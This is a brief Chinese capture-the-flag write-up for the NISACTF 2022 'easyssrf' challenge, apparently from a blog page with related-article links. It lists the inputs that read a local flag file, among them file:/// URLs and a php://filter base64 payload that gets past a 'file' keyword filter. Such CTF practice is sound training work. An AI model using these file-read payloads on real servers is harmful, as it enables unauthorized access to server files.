[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
Lionhacker5 小时前
网络工程师这个行业可以一直干到退休吗?
网络·数据库·网络安全·黑客·黑客技术
centos086 小时前
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
网络安全·二进制·pwn·ctf
程序员小予9 小时前
如何成为一名黑客?小白必学的12个基本步骤
计算机网络·安全·网络安全
蜗牛学苑_武汉11 小时前
Wazuh入侵检测系统的安装和基本使用
网络·网络安全
Sweet_vinegar11 小时前
变异凯撒(Crypto)
算法·安全·ctf·buuctf
乐茵安全11 小时前
linux基础
linux·运维·服务器·网络·安全·网络安全
Mr_Fmnwon12 小时前
【我的 PWN 学习手札】House of Roman
pwn·ctf·heap
如光照14 小时前
Linux与Windows中的流量抓取工具:wireshark与tcpdump
linux·windows·测试工具·网络安全
follycat15 小时前
2024强网杯Proxy
网络·学习·网络安全·go